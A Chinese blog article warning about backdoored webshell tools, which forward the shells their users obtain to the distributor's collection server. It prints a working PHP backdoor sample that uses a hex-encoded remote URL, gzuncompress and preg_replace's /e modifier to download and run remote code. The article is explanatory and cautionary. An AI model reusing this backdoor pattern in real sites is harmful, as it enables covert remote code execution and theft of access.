网络黑吃黑产业之”后门箱子”揭秘

释放双眼,带上耳机,听听看~!

在一些渗透测试中,往往会用到各种大马,小马,一句话,菜刀等等……但是你们有想过这些工具会存在后门吗?

何为webshell

webshell的获取一般要跟大马小马这些挂上一个√(就算是命令执行也需要shell)。webshell简单理解就是网站的一个管理程序,可以上传下载等等一系列操作,而大小马则是这个管理程序的代码。

揭秘网络黑吃黑产业之
关于后门

一般存在后门的话,所获得的shell会通过后门发送给箱子,那个箱子就是用来装shell的地方!

举个例子

<?php
error_reporting(0);
session_start();
header(“Content-type:text/html;charset=utf-8”);if(empty($_SESSION[‘api’]))
$_SESSION[‘api’]=substr(file_get_contents(
sprintf(‘%s?%s’,pack(“H*”,
‘687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067′),uniqid())),3649);
@preg_replace(“~(.*)~ies”,gzuncompress($_SESSION[‘api’]),null);
?>

这里我们主要看

sprintf(‘%s?%s’,pack(“H*”,’687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067′),uniqid())

这串代码看起来可能平平无奇,但是执行过后其实是一张箱子的图片地址,这个地址我就不放出来了,有兴趣的可以自己搭建解密!这个图片还需要调用file_get_contents函数读取图片为字符串,然后substr取3649字节之后的内容,再调用gzuncompress解压,得到真正的代码。最后调用preg_replace的修饰符e来执行恶意代码。然后,shell就被装进箱子里了。

黑吃黑是怎么形成的

其实网络安全圈子里定义一直模糊,有人兢兢业业挖洞,做src;有人背地里干违法勾当,赚黑心钱。天天在群里秀,挖洞的一部分人就会想

同样是技术,那凭什么我的付出和收入没有他做一单高?就受不住诱惑投入黑产了。殊不知在群里秀的那群人,早已喝茶去了……

极少数违法分子就觉得自己挖太危险了,重新换个思路:

提供大小马之类的工具,再写上一句免责声明,加个后门,想着坐等shell进账出售,出了事也不会被追究。毕竟后门代码一般小白还真不会去管,他们胆子大,技术差。这里奉劝萌新小白们别做事不经大脑思考,盲目炫技最后只能进去喝透心凉茶!!!

这伙人写好了后门,疯狂推广,进账,然后被抓…

“违法犯罪的事一定不能做!”

这就是黑吃黑产业链了,他们背后链接的产业咋们下期再说!

也希望各位网络安全爱好者,同行,且行且珍惜,莫做违法事!

给TA打赏
共{{data.count}}人
人已打赏
赚钱杂谈

4次中国互联网大战,你还记得哪个?

2020-6-19 21:24:03

赚钱杂谈

苹果税合理吗?好多用户失去“薅羊毛”资格

2020-6-23 14:05:23

⚠️
小财铺所有文章及资源均是用户投稿及网上搜集,仅供网友学习交流,未经作者或上传书面授权,请勿作他用 。
若您的权利被侵害,请联系站长 QQ: 1987880200 或者 留言反馈 ,我们将尽快处理 。
好消息:现小财铺VIP限时特价,随时恢复原价,点击了解详情
0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
今日签到
有新私信 私信列表
搜索